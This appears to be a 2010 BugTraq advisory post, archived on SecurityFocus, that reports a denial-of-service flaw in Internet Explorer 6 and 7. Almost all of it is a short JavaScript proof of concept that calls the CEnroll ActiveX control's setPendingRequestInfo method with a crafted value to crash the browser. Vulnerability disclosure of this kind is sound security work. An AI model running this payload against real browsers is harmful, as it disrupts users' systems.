BugTraq
Microsoft Internet Explorer Denial of Service Vulnerability Dec 14 2010 09:48PM
info securitylab ir
PoC:

<script language=javascript>

try

{

var tar = new ActiveXObject('CEnroll.CEnroll.2');

var a="sl";

tar.setPendingRequestInfo(0x05050505,a,a,a);

}

catch(sl){}

</script>

Tested on IE 6/7

Discovered by: Securitylab.ir (Kamran_st (at) yahoo (dot) com [email concealed])

Homepage: http://Securitylab.ir

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus